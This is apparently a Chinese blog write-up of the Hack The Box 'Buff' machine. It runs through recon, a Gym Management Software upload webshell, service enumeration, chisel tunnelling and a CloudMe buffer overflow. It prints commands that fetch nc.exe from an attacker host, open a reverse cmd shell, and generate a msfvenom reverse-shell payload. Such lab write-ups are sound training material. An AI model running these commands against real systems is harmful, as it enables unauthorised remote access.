【Hack The Box】windows练习-- Buff

HTB 学习笔记

【Hack The Box】windows练习-- Buff

---

🔥系列专栏：Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间：🌴2022年11月4日🌴
🍭作者水平很有限，如果发现错误，还望告知，感谢！

信息收集

8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
|_http-open-proxy: Proxy might be redirecting requests

1
2
3
4
5

我姑且认为这是一个用户名，然后还发现了一个可能是版本信息的东西

mrb3n
Made using Gym Management Software 1.0

去谷歌搜了一下
登陆绕过失败，绕过不了
但是它同时也说了存在一个upload目录可以绕过拿到webshell

目录爆破

我也确实扫出来了，但是不允许访问
那就先过，因为这是一个apache的站，所以我着重扫描了一下php的存在
发现的几个东西都没有啥东西，bp抓包分析了一下也不行

webshell

其实很奇怪，为什么谷歌没有搜到这个py脚本呢
直接执行即可，别忘了最后的/
反弹一个shell回来

curl http://10.10.14.20/nc.exe -o nc.exe
nc.exe -e cmd.exe 10.10.14.20 1234
1
2

提权

然后几个常用的枚举都不行，内核简单看来也没啥东西
那就分析一下服务

服务信息枚举

netstat -ano | findstr TCP | findstr ":0"
1

发现一个8888非常显眼，我一度以为是我开的
因为我真的很想发财

tasklist /v | findstr 7400
用下面这个命令全局搜索
for /r c:/ %i in (CloudMe*) do @echo %i
然后找到了这个文件
1
2
3
4

抓紧时间，因为会错过

然后把这个玩意放到search里搜索一下，发现是个缓冲区溢出
但是那个程序是本地开放的，并且windows里有也没有python
只能做个隧道

隧道搭建

./chisel_1.6.0_linux_amd64 server -p 8000 --reverse
./chisel.exe client 10.10.14.13:8000 R:8888:localhost:8888
1
2

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload
1

然后直接用就行了